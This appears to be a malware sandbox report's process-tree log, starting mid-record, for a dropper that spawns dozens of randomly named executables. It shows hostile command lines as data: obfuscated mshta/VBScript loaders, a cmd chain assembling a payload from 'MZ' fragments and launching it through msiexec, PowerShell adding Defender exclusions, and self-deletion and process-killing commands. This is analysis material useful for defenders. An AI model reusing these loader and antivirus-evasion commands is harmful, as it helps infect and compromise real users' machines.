        "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe" ) do taskkill -iM "%~NXI" -f
        10⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE
        
        ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02
        11⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )
        12⤵
        
        PID:7800
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f
        13⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBScripT: clOse(cREaTeObJECT( "wscRIPt.SHELL" ).rUN( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0, trUE ))
        12⤵
        
        PID:7820
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 &COpY /b /Y 9YM~jXrX.Lb3+OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE +qDrS.CQ~+ U78WYSY.oFM +f36Uy3.T ..\bJUC.L& DEl /q *&STArt msiexec.exe /Y ..\bjUC.l
        13⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Echo "
        14⤵
        
        PID:5180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"
        14⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /Y ..\bjUC.l
        14⤵
        
        PID:8744
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -iM "aWmuEHMZ6HX0l9SwHSx1W7XM.exe" -f
        11⤵
        Kills process with taskkill
        
        PID:1612
        
        C:\Users\Admin\Pictures\Adobe Films\5_o4gcvZYY2nyhkN9BJPPDsx.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\5_o4gcvZYY2nyhkN9BJPPDsx.exe"
        8⤵
        Executes dropped EXE
        
        PID:4180
        
        C:\Users\Admin\Pictures\Adobe Films\YXI5VkgcC3oBajO8h8Bm6jFD.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\YXI5VkgcC3oBajO8h8Bm6jFD.exe"
        8⤵
        
        PID:5320
        
        C:\Users\Admin\AppData\Local\Temp\is-COA3N.tmp\YXI5VkgcC3oBajO8h8Bm6jFD.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-COA3N.tmp\YXI5VkgcC3oBajO8h8Bm6jFD.tmp" /SL5="$1042E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\YXI5VkgcC3oBajO8h8Bm6jFD.exe"
        9⤵
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\is-EVSSH.tmp\DYbALA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-EVSSH.tmp\DYbALA.exe" /S /UID=2709
        10⤵
        
        PID:1656
        
        C:\Program Files\Windows Sidebar\CFCRMBZFOM\foldershare.exe
        
        "C:\Program Files\Windows Sidebar\CFCRMBZFOM\foldershare.exe" /VERYSILENT
        11⤵
        
        PID:6892
        
        C:\Users\Admin\AppData\Local\Temp\20-b8194-e6e-35690-83ffdd212d264\Myleshefaeni.exe
        
        "C:\Users\Admin\AppData\Local\Temp\20-b8194-e6e-35690-83ffdd212d264\Myleshefaeni.exe"
        11⤵
        
        PID:7652
        
        C:\Users\Admin\AppData\Local\Temp\e8-34cc2-d1b-6faa0-710cb0af2ddd0\ZHesetydici.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e8-34cc2-d1b-6faa0-710cb0af2ddd0\ZHesetydici.exe"
        11⤵
        
        PID:4064
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\usxtjkag.bir\GcleanerEU.exe /eufive & exit
        12⤵
        
        PID:7816
        
        C:\Users\Admin\AppData\Local\Temp\usxtjkag.bir\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\usxtjkag.bir\GcleanerEU.exe /eufive
        13⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\usxtjkag.bir\GcleanerEU.exe" & exit
        14⤵
        
        PID:6116
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        15⤵
        Kills process with taskkill
        
        PID:9176
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vcpiuzbb.wju\installer.exe /qn CAMPAIGN="654" & exit
        12⤵
        
        PID:7484
        
        C:\Users\Admin\AppData\Local\Temp\vcpiuzbb.wju\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\vcpiuzbb.wju\installer.exe /qn CAMPAIGN="654"
        13⤵
        
        PID:8228
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uauihz5d.ld1\any.exe & exit
        12⤵
        
        PID:5844
        
        C:\Users\Admin\AppData\Local\Temp\uauihz5d.ld1\any.exe
        
        C:\Users\Admin\AppData\Local\Temp\uauihz5d.ld1\any.exe
        13⤵
        
        PID:8456
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ht3yipae.acx\gcleaner.exe /mixfive & exit
        12⤵
        
        PID:6304
        
        C:\Users\Admin\AppData\Local\Temp\ht3yipae.acx\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\ht3yipae.acx\gcleaner.exe /mixfive
        13⤵
        
        PID:8640
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ht3yipae.acx\gcleaner.exe" & exit
        14⤵
        
        PID:8244
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        15⤵
        Kills process with taskkill
        
        PID:2284
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5j0g5x2r.k5f\autosubplayer.exe /S & exit
        12⤵
        
        PID:8072
        
        C:\Users\Admin\AppData\Local\Temp\5j0g5x2r.k5f\autosubplayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\5j0g5x2r.k5f\autosubplayer.exe /S
        13⤵
        
        PID:8876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf28B7.tmp\tempfile.ps1"
        14⤵
        
        PID:9104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf28B7.tmp\tempfile.ps1"
        14⤵
        
        PID:7132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf28B7.tmp\tempfile.ps1"
        14⤵
        
        PID:8260
        
        C:\Users\Admin\Pictures\Adobe Films\OlH_5zk6SOajJMBaIzB3tKoc.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\OlH_5zk6SOajJMBaIzB3tKoc.exe" silent
        8⤵
        
        PID:4880
        
        C:\Users\Admin\Pictures\Adobe Films\kCeJgpwJEQ7OeObDNgXblYxQ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\kCeJgpwJEQ7OeObDNgXblYxQ.exe"
        8⤵
        
        PID:5484
        
        C:\Users\Admin\Pictures\Adobe Films\3PNQWMBeGRaOuCEGBvyxaspV.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3PNQWMBeGRaOuCEGBvyxaspV.exe"
        8⤵
        
        PID:5688
        
        C:\Users\Admin\AppData\Roaming\3031410.scr
        
        "C:\Users\Admin\AppData\Roaming\3031410.scr" /S
        9⤵
        
        PID:196
        
        C:\Users\Admin\AppData\Roaming\6504660.scr
        
        "C:\Users\Admin\AppData\Roaming\6504660.scr" /S
        9⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Roaming\7857317.scr
        
        "C:\Users\Admin\AppData\Roaming\7857317.scr" /S
        9⤵
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1820
        
        C:\Users\Admin\AppData\Roaming\2867536.scr
        
        "C:\Users\Admin\AppData\Roaming\2867536.scr" /S
        9⤵
        
        PID:6352
        
        C:\Users\Admin\AppData\Roaming\7691748.scr
        
        "C:\Users\Admin\AppData\Roaming\7691748.scr" /S
        9⤵
        
        PID:5828
      - C:\Users\Admin\Pictures\Adobe Films\VEU6WWfDCCPAZhM1e7ghicaz.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\VEU6WWfDCCPAZhM1e7ghicaz.exe"
        6⤵
        
        PID:4460
      - C:\Users\Admin\Pictures\Adobe Films\c57zPDvNrTsfCwZNxpkhdJac.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\c57zPDvNrTsfCwZNxpkhdJac.exe"
        6⤵
        
        PID:2660
      - C:\Users\Admin\Pictures\Adobe Films\izDNM8R_HszvjoERZBS8xgq2.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\izDNM8R_HszvjoERZBS8xgq2.exe"
        6⤵
        
        PID:2688
      - C:\Users\Admin\Pictures\Adobe Films\7sju9znCXIWb_JmA7pnUr08O.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7sju9znCXIWb_JmA7pnUr08O.exe"
        6⤵
        
        PID:4856
        
        C:\Users\Admin\Pictures\Adobe Films\7sju9znCXIWb_JmA7pnUr08O.exe
        
        "7sju9znCXIWb_JmA7pnUr08O.exe"
        7⤵
        Executes dropped EXE
        
        PID:1876
        
        C:\Users\Admin\Pictures\Adobe Films\7sju9znCXIWb_JmA7pnUr08O.exe
        
        "7sju9znCXIWb_JmA7pnUr08O.exe"
        7⤵
        
        PID:6128
        
        C:\Users\Admin\Pictures\Adobe Films\7sju9znCXIWb_JmA7pnUr08O.exe
        
        "7sju9znCXIWb_JmA7pnUr08O.exe"
        7⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 144
        8⤵
        Program crash
        
        PID:3540
      - C:\Users\Admin\Pictures\Adobe Films\CnwQgaUz8S8n79MlHuM3IWQv.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\CnwQgaUz8S8n79MlHuM3IWQv.exe"
        6⤵
        
        PID:4100
      - C:\Users\Admin\Pictures\Adobe Films\u9_QJqr4yg7IkHzdpnHv8O1h.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\u9_QJqr4yg7IkHzdpnHv8O1h.exe"
        6⤵
        
        PID:5228
        
        C:\Users\Admin\Pictures\Adobe Films\u9_QJqr4yg7IkHzdpnHv8O1h.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\u9_QJqr4yg7IkHzdpnHv8O1h.exe"
        7⤵
        
        PID:6156
      - C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe"
        6⤵
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\332f07d2-8d86-4046-a733-4064f7706e08\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\332f07d2-8d86-4046-a733-4064f7706e08\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\332f07d2-8d86-4046-a733-4064f7706e08\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        7⤵
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\332f07d2-8d86-4046-a733-4064f7706e08\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\332f07d2-8d86-4046-a733-4064f7706e08\AdvancedRun.exe" /SpecialRun 4101d8 5104
        8⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe" -Force
        7⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe" -Force
        7⤵
        
        PID:7040
        
        C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe"
        7⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5172 -s 2116
        7⤵
        Program crash
        
        PID:6800
      - C:\Users\Admin\Pictures\Adobe Films\rV16q1YPVhNWv2Xw_wHZIRB5.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\rV16q1YPVhNWv2Xw_wHZIRB5.exe"
        6⤵
        
        PID:5460
      - C:\Users\Admin\Pictures\Adobe Films\yMqJOU4GkTaE_oFGucqvACYk.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\yMqJOU4GkTaE_oFGucqvACYk.exe"
        6⤵
        
        PID:5380
      - C:\Users\Admin\Pictures\Adobe Films\h4tBNwBxQiWLtk8sxZOQx27X.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\h4tBNwBxQiWLtk8sxZOQx27X.exe"
        6⤵
        
        PID:5340
      - C:\Users\Admin\Pictures\Adobe Films\7RLJUl3vyC5MIF4YYADZ6S4Z.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7RLJUl3vyC5MIF4YYADZ6S4Z.exe"
        6⤵
        
        PID:5596
        
        C:\Users\Admin\Pictures\Adobe Films\7RLJUl3vyC5MIF4YYADZ6S4Z.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7RLJUl3vyC5MIF4YYADZ6S4Z.exe"
        7⤵
        
        PID:7144
      - C:\Users\Admin\Pictures\Adobe Films\e_xXqjOHlcjfHUvzECU_TNt8.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\e_xXqjOHlcjfHUvzECU_TNt8.exe"
        6⤵
        
        PID:5708
      - C:\Users\Admin\Pictures\Adobe Films\WYXnfO2BEjHCEfCon6WlprQX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\WYXnfO2BEjHCEfCon6WlprQX.exe"
        6⤵
        
        PID:6092
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "WYXnfO2BEjHCEfCon6WlprQX.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\WYXnfO2BEjHCEfCon6WlprQX.exe" & exit
        7⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "WYXnfO2BEjHCEfCon6WlprQX.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:7736
      - C:\Users\Admin\Pictures\Adobe Films\d0XiFBva5HAR92zpaj4HITEU.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\d0XiFBva5HAR92zpaj4HITEU.exe"
        6⤵
        
        PID:6016
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        7⤵
        
        PID:6436
      - C:\Users\Admin\Pictures\Adobe Films\lLYslOejhtXgqf8bayF_maUW.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lLYslOejhtXgqf8bayF_maUW.exe"
        6⤵
        
        PID:5812
      - C:\Users\Admin\Pictures\Adobe Films\KFPcGgJ_lzPiMhBkkksUvxS8.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\KFPcGgJ_lzPiMhBkkksUvxS8.exe"
        6⤵
        
        PID:6116
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\KFPcGgJ_lzPiMhBkkksUvxS8.exe"
        7⤵
        
        PID:5040
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:5568
      - C:\Users\Admin\Pictures\Adobe Films\nGZvvlhtxMJX3fHMXGDG7RUJ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\nGZvvlhtxMJX3fHMXGDG7RUJ.exe"
        6⤵
        
        PID:4772
      - C:\Users\Admin\Pictures\Adobe Films\obcPlOcCxtvezRdtqJgVgDmz.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\obcPlOcCxtvezRdtqJgVgDmz.exe"
        6⤵
        
        PID:4432
      - C:\Users\Admin\Pictures\Adobe Films\j4bu0_hU4ojJiiVYKVnO09gN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\j4bu0_hU4ojJiiVYKVnO09gN.exe"
        6⤵
        
        PID:312
      - C:\Users\Admin\Pictures\Adobe Films\L7n7bPzUheCAgeS1hVnzSUKM.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\L7n7bPzUheCAgeS1hVnzSUKM.exe"
        6⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:6676
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:8088
      - C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe"
        6⤵
        
        PID:1256
        
        C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe"
        7⤵
        
        PID:6188
        
        C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe"
        7⤵
        
        PID:6520
      - C:\Users\Admin\Pictures\Adobe Films\mM4ZFXjepgjUOmYTeUHCXB1q.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\mM4ZFXjepgjUOmYTeUHCXB1q.exe"
        6⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Roaming\1069175.scr
        
        "C:\Users\Admin\AppData\Roaming\1069175.scr" /S
        7⤵
        
        PID:5420
        
        C:\Users\Admin\AppData\Roaming\5117125.scr
        
        "C:\Users\Admin\AppData\Roaming\5117125.scr" /S
        7⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Roaming\1471048.scr
        
        "C:\Users\Admin\AppData\Roaming\1471048.scr" /S
        7⤵
        
        PID:7224
        
        C:\Users\Admin\AppData\Roaming\8022933.scr
        
        "C:\Users\Admin\AppData\Roaming\8022933.scr" /S
        7⤵
        
        PID:7448
        
        C:\Users\Admin\AppData\Roaming\7106892.scr
        
        "C:\Users\Admin\AppData\Roaming\7106892.scr" /S
        7⤵
        
        PID:7528
      - C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe"
        6⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )
        7⤵
        
        PID:6500
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe" ) do taskkill -iM "%~NXI" -f
        8⤵
        
        PID:6892
        
        C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE
        
        ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02
        9⤵
        
        PID:4576
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )
        10⤵
        
        PID:4196
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02&iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f
        11⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBScripT: clOse(cREaTeObJECT( "wscRIPt.SHELL" ).rUN( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0, trUE ))
        10⤵
        
        PID:7560
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 &COpY /b /Y 9YM~jXrX.Lb3+OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE +qDrS.CQ~+ U78WYSY.oFM +f36Uy3.T ..\bJUC.L& DEl /q *&STArt msiexec.exe /Y ..\bjUC.l
        11⤵
        
        PID:7948
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Echo "
        12⤵
        
        PID:7488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"
        12⤵
        
        PID:7572
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /Y ..\bjUC.l
        12⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -iM "74i11n2FnXRSuQejdkCzDilT.exe" -f
        9⤵
        Kills process with taskkill
        
        PID:6488
      - C:\Users\Admin\Pictures\Adobe Films\viuBaC_RPD1BoBwJpxmES_Lj.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\viuBaC_RPD1BoBwJpxmES_Lj.exe"
        6⤵
        
        PID:5876
      - C:\Users\Admin\Pictures\Adobe Films\fXT2DYRIPHdhxLz30m6OVyTF.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\fXT2DYRIPHdhxLz30m6OVyTF.exe"
        6⤵
        
        PID:2164
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        7⤵
        
        PID:3200
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--N3tIj0CCa"
        8⤵
        
        PID:6396
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1c4,0x1e8,0x7fff0b6adec0,0x7fff0b6aded0,0x7fff0b6adee0
        9⤵
        
        PID:8924
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --mojo-platform-channel-handle=1680 /prefetch:8
        9⤵
        
        PID:9080
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1524 /prefetch:2
        9⤵
        
        PID:8604
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --mojo-platform-channel-handle=2236 /prefetch:8
        9⤵
        
        PID:9036
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
